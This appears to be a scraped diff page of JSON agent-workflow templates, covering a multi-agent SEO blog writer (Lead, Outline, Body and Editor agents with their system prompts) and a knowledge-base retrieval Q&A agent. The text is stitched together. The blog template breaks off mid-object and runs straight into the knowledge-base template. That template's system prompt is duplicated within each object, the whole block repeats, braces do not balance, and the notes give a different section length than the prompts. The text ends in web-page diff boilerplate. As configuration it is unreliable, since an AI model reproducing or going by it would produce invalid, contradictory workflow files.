Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Lead Agent"
},
"id":"Agent:LuckyApplesGrab",
"measured":{
"height":84,
"width":200
},
"position":{
"x":350,
"y":200
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"content":[
"{Agent:LuckyApplesGrab@content}"
]
},
"label":"Message",
"name":"Response"
},
"dragging":false,
"id":"Message:ModernSwansThrow",
"measured":{
"height":56,
"width":200
},
"position":{
"x":669.394830760932,
"y":190.72421137520644
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"messageNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Outline Agent"
},
"dragging":false,
"id":"Agent:SlickSpidersTurn",
"measured":{
"height":84,
"width":200
},
"position":{
"x":100.60137004146719,
"y":411.67654846431367
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Body Agent"
},
"dragging":false,
"id":"Agent:IcyPawsRescue",
"measured":{
"height":84,
"width":200
},
"position":{
"x":439.3374395738501,
"y":366.1408588516909
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Editor Agent"
},
"dragging":false,
"id":"Agent:TenderAdsAllow",
"measured":{
"height":84,
"width":200
},
"position":{
"x":730.8513124709204,
"y":327.351197329827
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_0"
},
"dragging":false,
"id":"Tool:ThreeWallsRing",
"measured":{
"height":48,
"width":200
},
"position":{
"x":-26.93431957115564,
"y":531.4384641920368
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_1"
},
"dragging":false,
"id":"Tool:FloppyJokesItch",
"measured":{
"height":48,
"width":200
},
"position":{
"x":414.6786783453011,
"y":499.39483076093194
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"text":"This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI \u201cwriters\u201d, where each agent plays a specialized role \u2014 just like a real editorial team.\n\nInstead of one AI doing everything in order, this version uses a **Lead Agent** to assign tasks to different sub-agents, who then write and edit the blog in parallel. The Lead Agent manages everything and produces the final output.\n\n### Why use multi-agent format?\n\n- Better control over each stage of writing \n- Easier to reuse agents across tasks \n- More human-like workflow (planning \u2192 writing \u2192 editing \u2192 publishing) \n- Easier to scale and customize for advanced users\n\n### Flow Summary:\n\n1. `LeadWriter_Agent` takes your input and creates a plan\n2. It sends that plan to:\n - `OutlineWriter_Agent`: build blog structure\n - `BodyWriter_Agent`: write full content\n - `FinalEditor_Agent`: polish and finalize\n3. `LeadWriter_Agent` collects all results and outputs the final blog post\n"
},
"label":"Note",
"name":"Workflow Overall Description"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":208,
"id":"Note:ElevenVansInvent",
"measured":{
"height":208,
"width":518
},
"position":{
"x":-336.6586460874556,
"y":113.43253511344867
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":518
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis is the central agent that controls the entire writing process.\n\n**What it does**:\n- Reads your blog topic and intent\n- Generates a clear writing plan (topic, audience, goal, keywords)\n- Sends instructions to all sub-agents\n- Waits for their responses and checks quality\n- If any section is missing or weak, it can request a rewrite\n- Finally, it assembles all parts into a complete blog and sends it back to you\n"
},
"label":"Note",
"name":"Lead Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":146,
"id":"Note:EmptyClubsGreet",
"measured":{
"height":146,
"width":334
},
"position":{
"x":390.1408623279084,
"y":2.6521144030202493
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":334
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is responsible for building the blog's structure. It creates an outline that shows what the article will cover and how it's organized.\n\n**What it does**:\n- Suggests a blog title that matches the topic and keywords \n- Breaks the article into sections using H2 and H3 headers \n- Adds a short description of what each section should include \n- Assigns SEO keywords to each section for better search visibility \n- Uses search data (via Tavily Search) to find how similar blogs are structured"
},
"label":"Note",
"name":"Outline Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":157,
"id":"Note:CurlyTigersDouble",
"measured":{
"height":157,
"width":394
},
"position":{
"x":-60.03139680691618,
"y":595.8208080534818
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":394
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is in charge of writing the full blog content, section by section, based on the outline it receives.\n\n**What it does**:\n- Takes each section heading from the outline (H2 / H3)\n- Writes a complete paragraph (150\u2013220 words) under each section\n- Naturally includes the keywords provided for that section\n- Uses the Tavily Search tool to add real-world examples, definitions, or facts if needed\n- Makes sure each section is clear, useful, and easy to read\n"
},
"label":"Note",
"name":"Body Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":164,
"id":"Note:StrongKingsCamp",
"measured":{
"height":164,
"width":408
},
"position":{
"x":446.54943226110845,
"y":590.9443887062529
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":408
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent reviews, polishes, and finalizes the blog post written by the BodyWriter_Agent. It ensures everything is clean, smooth, and SEO-compliant.\n\n**What it does**:\n- Improves grammar, sentence flow, and transitions \n- Makes sure the content reads naturally and professionally \n- Checks whether keywords are present and well integrated (but not overused) \n- Verifies that the structure follows the correct H1/H2/H3 format \n"
"en":"A report generation assistant using local knowledge base, with advanced capabilities in task planning, reasoning, and reflective analysis. Recommended for academic research paper Q&A",
"de":"Ein Berichtsgenerierungsassistent, der eine lokale Wissensdatenbank nutzt, mit erweiterten Fähigkeiten in Aufgabenplanung, Schlussfolgerung und reflektierender Analyse. Empfohlen für akademische Forschungspapier-Fragen und -Antworten.",
"sys_prompt":"## Role & Task\nYou are a **\u201cKnowledge Base Retrieval Q\\&A Agent\u201d** whose goal is to break down the user\u2019s question into retrievable subtasks, and then produce a multi-source-verified, structured, and actionable research report using the internal knowledge base.\n## Execution Framework (Detailed Steps & Key Points)\n1. **Assessment & Decomposition**\n * Actions:\n * Automatically extract: main topic, subtopics, entities (people/organizations/products/technologies), time window, geographic/business scope.\n * Output as a list: N facts/data points that must be collected (*N* ranges from 5\u201320 depending on question complexity).\n2. **Query Type Determination (Rule-Based)**\n * Example rules:\n * If the question involves a single issue but requests \u201cmethod comparison/multiple explanations\u201d \u2192 use **depth-first**.\n * If the question can naturally be split into \u22653 independent sub-questions \u2192 use **breadth-first**.\n * If the question can be answered by a single fact/specification/definition \u2192 use **simple query**.\n3. **Research Plan Formulation**\n * Depth-first: define 3\u20135 perspectives (methodology/stakeholders/time dimension/technical route, etc.), assign search keywords, target document types, and output format for each perspective.\n * Breadth-first: list subtasks, prioritize them, and assign search terms.\n * Simple query: directly provide the search sentence and required fields.\n4. **Retrieval Execution**\n * After retrieval: perform coverage check (does it contain the key facts?) and quality check (source diversity, authority, latest update time).\n * If standards are not met, automatically loop: rewrite queries (synonyms/cross-domain terms) and retry \u22643 times, or flag as requiring external search.\n5. **Integration & Reasoning**\n * Build the answer using a **fact\u2013evidence\u2013reasoning** chain. For each conclusion, attach 1\u20132 strongest pieces of evidence.\n---\n## Quality Gate Checklist (Verify at Each Stage)\n* **Stage 1 (Decomposition)**:\n * [ ] Key concepts and expected outputs identified\n * [ ] Required facts/data points listed\n* **Stage 2 (Retrieval)**:\n * [ ] Meets quality standards (see above)\n * [ ] If not met: execute query iteration\n* **Stage 3 (Generation)**:\n * [ ] Each conclusion has at least one direct evidence source\n * [ ] State assumptions/uncertainties\n * [ ] Provide next-step suggestions or experiment/retrieval plans\n * [ ] Final length and depth match user expectations (comply with word count/format if specified)\n---\n## Core Principles\n1. **Strict reliance on the knowledge base**: answers must be **fully bounded** by the content retrieved from the knowledge base.\n2. **No fabrication**: do not generate, infer, or create information that is not explicitly present in the knowledge base.\n3. **Accuracy first**: prefer incompleteness over inaccurate content.\n4. **Output format**:\n * Hierarchically clear modular structure\n * Logical grouping according to the MECE principle\n * Professionally presented formatting\n * Step-by-step cognitive guidance\n * Reasonable use of headings and dividers for clarity\n * *Italicize* key parameters\n * **Bold** critical information\n5. **LaTeX formula requirements**:\n * Inline formulas: start and end with `$`\n * Block formulas: start and end with `$$`, each `$$` on its own line\n * Block formula content must comply with LaTeX math syntax\n * Verify formula correctness\n---\n## Additional Notes (Interaction & Failure Strategy)\n* If the knowledge base does not cover critical facts: explicitly inform the user (with sample wording)\n* For time-sensitive issues: enforce time filtering in the search request, and indicate the latest retrieval date in the answer.\n* Language requirement: answer in the user\u2019s preferred language\n",
"sys_prompt":"## Role & Task\nYou are a **\u201cKnowledge Base Retrieval Q\\&A Agent\u201d** whose goal is to break down the user\u2019s question into retrievable subtasks, and then produce a multi-source-verified, structured, and actionable research report using the internal knowledge base.\n## Execution Framework (Detailed Steps & Key Points)\n1. **Assessment & Decomposition**\n * Actions:\n * Automatically extract: main topic, subtopics, entities (people/organizations/products/technologies), time window, geographic/business scope.\n * Output as a list: N facts/data points that must be collected (*N* ranges from 5\u201320 depending on question complexity).\n2. **Query Type Determination (Rule-Based)**\n * Example rules:\n * If the question involves a single issue but requests \u201cmethod comparison/multiple explanations\u201d \u2192 use **depth-first**.\n * If the question can naturally be split into \u22653 independent sub-questions \u2192 use **breadth-first**.\n * If the question can be answered by a single fact/specification/definition \u2192 use **simple query**.\n3. **Research Plan Formulation**\n * Depth-first: define 3\u20135 perspectives (methodology/stakeholders/time dimension/technical route, etc.), assign search keywords, target document types, and output format for each perspective.\n * Breadth-first: list subtasks, prioritize them, and assign search terms.\n * Simple query: directly provide the search sentence and required fields.\n4. **Retrieval Execution**\n * After retrieval: perform coverage check (does it contain the key facts?) and quality check (source diversity, authority, latest update time).\n * If standards are not met, automatically loop: rewrite queries (synonyms/cross-domain terms) and retry \u22643 times, or flag as requiring external search.\n5. **Integration & Reasoning**\n * Build the answer using a **fact\u2013evidence\u2013reasoning** chain. For each conclusion, attach 1\u20132 strongest pieces of evidence.\n---\n## Quality Gate Checklist (Verify at Each Stage)\n* **Stage 1 (Decomposition)**:\n * [ ] Key concepts and expected outputs identified\n * [ ] Required facts/data points listed\n* **Stage 2 (Retrieval)**:\n * [ ] Meets quality standards (see above)\n * [ ] If not met: execute query iteration\n* **Stage 3 (Generation)**:\n * [ ] Each conclusion has at least one direct evidence source\n * [ ] State assumptions/uncertainties\n * [ ] Provide next-step suggestions or experiment/retrieval plans\n * [ ] Final length and depth match user expectations (comply with word count/format if specified)\n---\n## Core Principles\n1. **Strict reliance on the knowledge base**: answers must be **fully bounded** by the content retrieved from the knowledge base.\n2. **No fabrication**: do not generate, infer, or create information that is not explicitly present in the knowledge base.\n3. **Accuracy first**: prefer incompleteness over inaccurate content.\n4. **Output format**:\n * Hierarchically clear modular structure\n * Logical grouping according to the MECE principle\n * Professionally presented formatting\n * Step-by-step cognitive guidance\n * Reasonable use of headings and dividers for clarity\n * *Italicize* key parameters\n * **Bold** critical information\n5. **LaTeX formula requirements**:\n * Inline formulas: start and end with `$`\n * Block formulas: start and end with `$$`, each `$$` on its own line\n * Block formula content must comply with LaTeX math syntax\n * Verify formula correctness\n---\n## Additional Notes (Interaction & Failure Strategy)\n* If the knowledge base does not cover critical facts: explicitly inform the user (with sample wording)\n* For time-sensitive issues: enforce time filtering in the search request, and indicate the latest retrieval date in the answer.\n* Language requirement: answer in the user\u2019s preferred language\n",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[
{
"component_name":"Retrieval",
"name":"Retrieval",
"params":{
"cross_languages":[],
"description":"",
"empty_response":"",
"kb_ids":[],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Knowledge Base Agent"
},
"dragging":false,
"id":"Agent:NewPumasLick",
"measured":{
"height":84,
"width":200
},
"position":{
"x":347.00048227952215,
"y":186.49109364794631
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
"en":"A report generation assistant using local knowledge base, with advanced capabilities in task planning, reasoning, and reflective analysis. Recommended for academic research paper Q&A",
"de":"Ein Berichtsgenerierungsassistent, der eine lokale Wissensdatenbank nutzt, mit erweiterten Fähigkeiten in Aufgabenplanung, Schlussfolgerung und reflektierender Analyse. Empfohlen für akademische Forschungspapier-Fragen und -Antworten.",
"sys_prompt":"## Role & Task\nYou are a **\u201cKnowledge Base Retrieval Q\\&A Agent\u201d** whose goal is to break down the user\u2019s question into retrievable subtasks, and then produce a multi-source-verified, structured, and actionable research report using the internal knowledge base.\n## Execution Framework (Detailed Steps & Key Points)\n1. **Assessment & Decomposition**\n * Actions:\n * Automatically extract: main topic, subtopics, entities (people/organizations/products/technologies), time window, geographic/business scope.\n * Output as a list: N facts/data points that must be collected (*N* ranges from 5\u201320 depending on question complexity).\n2. **Query Type Determination (Rule-Based)**\n * Example rules:\n * If the question involves a single issue but requests \u201cmethod comparison/multiple explanations\u201d \u2192 use **depth-first**.\n * If the question can naturally be split into \u22653 independent sub-questions \u2192 use **breadth-first**.\n * If the question can be answered by a single fact/specification/definition \u2192 use **simple query**.\n3. **Research Plan Formulation**\n * Depth-first: define 3\u20135 perspectives (methodology/stakeholders/time dimension/technical route, etc.), assign search keywords, target document types, and output format for each perspective.\n * Breadth-first: list subtasks, prioritize them, and assign search terms.\n * Simple query: directly provide the search sentence and required fields.\n4. **Retrieval Execution**\n * After retrieval: perform coverage check (does it contain the key facts?) and quality check (source diversity, authority, latest update time).\n * If standards are not met, automatically loop: rewrite queries (synonyms/cross-domain terms) and retry \u22643 times, or flag as requiring external search.\n5. **Integration & Reasoning**\n * Build the answer using a **fact\u2013evidence\u2013reasoning** chain. For each conclusion, attach 1\u20132 strongest pieces of evidence.\n---\n## Quality Gate Checklist (Verify at Each Stage)\n* **Stage 1 (Decomposition)**:\n * [ ] Key concepts and expected outputs identified\n * [ ] Required facts/data points listed\n* **Stage 2 (Retrieval)**:\n * [ ] Meets quality standards (see above)\n * [ ] If not met: execute query iteration\n* **Stage 3 (Generation)**:\n * [ ] Each conclusion has at least one direct evidence source\n * [ ] State assumptions/uncertainties\n * [ ] Provide next-step suggestions or experiment/retrieval plans\n * [ ] Final length and depth match user expectations (comply with word count/format if specified)\n---\n## Core Principles\n1. **Strict reliance on the knowledge base**: answers must be **fully bounded** by the content retrieved from the knowledge base.\n2. **No fabrication**: do not generate, infer, or create information that is not explicitly present in the knowledge base.\n3. **Accuracy first**: prefer incompleteness over inaccurate content.\n4. **Output format**:\n * Hierarchically clear modular structure\n * Logical grouping according to the MECE principle\n * Professionally presented formatting\n * Step-by-step cognitive guidance\n * Reasonable use of headings and dividers for clarity\n * *Italicize* key parameters\n * **Bold** critical information\n5. **LaTeX formula requirements**:\n * Inline formulas: start and end with `$`\n * Block formulas: start and end with `$$`, each `$$` on its own line\n * Block formula content must comply with LaTeX math syntax\n * Verify formula correctness\n---\n## Additional Notes (Interaction & Failure Strategy)\n* If the knowledge base does not cover critical facts: explicitly inform the user (with sample wording)\n* For time-sensitive issues: enforce time filtering in the search request, and indicate the latest retrieval date in the answer.\n* Language requirement: answer in the user\u2019s preferred language\n",
"sys_prompt":"## Role & Task\nYou are a **\u201cKnowledge Base Retrieval Q\\&A Agent\u201d** whose goal is to break down the user\u2019s question into retrievable subtasks, and then produce a multi-source-verified, structured, and actionable research report using the internal knowledge base.\n## Execution Framework (Detailed Steps & Key Points)\n1. **Assessment & Decomposition**\n * Actions:\n * Automatically extract: main topic, subtopics, entities (people/organizations/products/technologies), time window, geographic/business scope.\n * Output as a list: N facts/data points that must be collected (*N* ranges from 5\u201320 depending on question complexity).\n2. **Query Type Determination (Rule-Based)**\n * Example rules:\n * If the question involves a single issue but requests \u201cmethod comparison/multiple explanations\u201d \u2192 use **depth-first**.\n * If the question can naturally be split into \u22653 independent sub-questions \u2192 use **breadth-first**.\n * If the question can be answered by a single fact/specification/definition \u2192 use **simple query**.\n3. **Research Plan Formulation**\n * Depth-first: define 3\u20135 perspectives (methodology/stakeholders/time dimension/technical route, etc.), assign search keywords, target document types, and output format for each perspective.\n * Breadth-first: list subtasks, prioritize them, and assign search terms.\n * Simple query: directly provide the search sentence and required fields.\n4. **Retrieval Execution**\n * After retrieval: perform coverage check (does it contain the key facts?) and quality check (source diversity, authority, latest update time).\n * If standards are not met, automatically loop: rewrite queries (synonyms/cross-domain terms) and retry \u22643 times, or flag as requiring external search.\n5. **Integration & Reasoning**\n * Build the answer using a **fact\u2013evidence\u2013reasoning** chain. For each conclusion, attach 1\u20132 strongest pieces of evidence.\n---\n## Quality Gate Checklist (Verify at Each Stage)\n* **Stage 1 (Decomposition)**:\n * [ ] Key concepts and expected outputs identified\n * [ ] Required facts/data points listed\n* **Stage 2 (Retrieval)**:\n * [ ] Meets quality standards (see above)\n * [ ] If not met: execute query iteration\n* **Stage 3 (Generation)**:\n * [ ] Each conclusion has at least one direct evidence source\n * [ ] State assumptions/uncertainties\n * [ ] Provide next-step suggestions or experiment/retrieval plans\n * [ ] Final length and depth match user expectations (comply with word count/format if specified)\n---\n## Core Principles\n1. **Strict reliance on the knowledge base**: answers must be **fully bounded** by the content retrieved from the knowledge base.\n2. **No fabrication**: do not generate, infer, or create information that is not explicitly present in the knowledge base.\n3. **Accuracy first**: prefer incompleteness over inaccurate content.\n4. **Output format**:\n * Hierarchically clear modular structure\n * Logical grouping according to the MECE principle\n * Professionally presented formatting\n * Step-by-step cognitive guidance\n * Reasonable use of headings and dividers for clarity\n * *Italicize* key parameters\n * **Bold** critical information\n5. **LaTeX formula requirements**:\n * Inline formulas: start and end with `$`\n * Block formulas: start and end with `$$`, each `$$` on its own line\n * Block formula content must comply with LaTeX math syntax\n * Verify formula correctness\n---\n## Additional Notes (Interaction & Failure Strategy)\n* If the knowledge base does not cover critical facts: explicitly inform the user (with sample wording)\n* For time-sensitive issues: enforce time filtering in the search request, and indicate the latest retrieval date in the answer.\n* Language requirement: answer in the user\u2019s preferred language\n",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[
{
"component_name":"Retrieval",
"name":"Retrieval",
"params":{
"cross_languages":[],
"description":"",
"empty_response":"",
"kb_ids":[],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Knowledge Base Agent"
},
"dragging":false,
"id":"Agent:NewPumasLick",
"measured":{
"height":84,
"width":200
},
"position":{
"x":347.00048227952215,
"y":186.49109364794631
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
Some files were not shown because too many files have changed in this diff
Show More
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.